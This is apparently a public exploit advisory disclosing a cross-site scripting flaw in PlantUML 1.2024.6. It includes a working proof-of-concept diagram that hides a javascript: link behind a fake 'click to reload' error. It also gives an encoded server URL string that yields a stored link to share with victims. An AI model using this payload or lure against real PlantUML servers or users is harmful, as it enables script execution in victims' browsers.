Share
## https://sploitus.com/exploit?id=PACKETSTORM:180344
#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)  
#Date: 23/08/2024  
#Exploit Author: Hosein Vita  
#Vendor Homepage: https://plantuml.com/  
#Version: 1.2024.6  
#Tested on: Linux  
  
  
Description:  
This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.  
  
Proof of Concept:  
plantuml  
Copy code  
@startuml  
digraph G {  
graph [bgcolor="white"];  
node [shape=box, style="rounded,filled", color="white"];  
heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];  
}  
@enduml  
Alternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:  
  
Copy code  
PK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_V  
This proof-of-concept remains stored and can be shared as a link with potential victims.